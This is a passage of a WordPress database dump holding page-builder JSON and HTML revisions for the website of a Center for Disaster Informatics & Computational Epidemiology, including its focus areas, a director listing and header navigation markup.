-----<\\/p>\"}},{\"name\":\"hop-image\",\"parentId\":\"453-c13\",\"index\":2,\"id\":\"453-c16\",\"partialId\":453,\"styleRef\":661,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Chetan-Tiwari_300x300-e1651236386247-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1265,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"453-c13\",\"index\":3,\"id\":\"453-c17\",\"partialId\":453,\"styleRef\":662,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":4,\"id\":\"453-c18\",\"partialId\":453,\"styleRef\":663,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}}],\"styleRef\":658,\"type\":\"content\"}],\"id\":\"453-c12\",\"parentId\":\"453-c11\",\"partialId\":453,\"styleRef\":657,\"type\":\"content\"}],\"id\":\"453-c11\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":656,\"type\":\"content\"}],\"id\":\"453-c1\",\"partialId\":453,\"styleRef\":642,\"type\":\"content\"}','','','inherit','closed','closed','','1224-revision-v1','','','2022-04-29 08:48:47','2022-04-29 12:48:47','',1224,'https://gsudice.dataconn.net/?p=1273',0,'revision','',0),(1280,1,'2022-04-29 08:54:56','2022-04-29 12:54:56','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c5\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c7\",\"parentId\":\"20-c6\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c7\",\"index\":0,\"id\":\"20-c8\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c6\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c10\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c10\",\"index\":0,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c12\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c14\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c14\",\"index\":0,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c16\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c17\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c18\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c18\",\"index\":0,\"id\":\"20-c19\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c20\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c21\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c9\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-04-29 08:54:56','2022-04-29 12:54:56','',168,'https://gsudice.dataconn.net/?p=1280',0,'revision','',0),(1281,1,'2022-04-29 08:54:56','2022-04-29 12:54:56','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c5-outer\">\n <div data-colibri-id=\"20-c5\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c5 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c6 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c7-outer\">\n <div data-colibri-id=\"20-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c8\" class=\"h-global-transition-all h-heading style-334 style-local-20-c8 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-334 style-local-20-c8\">\n <!---->\n <!---->\n <h1 class=\"\">Focus Areas</h1>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c9\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c10-outer\">\n <div data-colibri-id=\"20-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c11\" class=\"h-icon style-274 style-local-20-c11 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c11-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c12\" class=\"h-global-transition-all h-heading style-275 style-local-20-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c12\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c13\" class=\"h-text h-text-component style-276 style-local-20-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c14-outer\">\n <div data-colibri-id=\"20-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c15\" class=\"h-icon style-274 style-local-20-c15 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c15-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c16\" class=\"h-global-transition-all h-heading style-275 style-local-20-c16 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c16\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c17\" class=\"h-text h-text-component style-276 style-local-20-c17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c18-outer\">\n <div data-colibri-id=\"20-c18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c19\" class=\"h-icon style-274 style-local-20-c19 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c19-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c20\" class=\"h-global-transition-all h-heading style-275 style-local-20-c20 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c20\">\n <!---->\n <!---->\n <h5 class=\"\">Impact assessment</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c21\" class=\"h-text h-text-component style-276 style-local-20-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-04-29 08:54:56','2022-04-29 12:54:56','',20,'https://gsudice.dataconn.net/?p=1281',0,'revision','',0),(1282,1,'2022-04-29 08:54:56','2022-04-29 12:54:56','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h38\",\"parentId\":\"22-h37\",\"partialId\":22,\"styleRef\":678,\"type\":\"header\",\"props\":{\"text\":\"our mission\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/members\\/our-mission\\/\"}}}],\"slot\":null,\"parentId\":\"22-h26\",\"index\":2,\"id\":\"22-h37\",\"partialId\":22,\"styleRef\":677,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-04-29 08:54:56','2022-04-29 12:54:56','',23,'https://gsudice.dataconn.net/?p=1282',0,'revision','',0),(1283,1,'2022-04-29 08:54:56','2022-04-29 12:54:56','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div 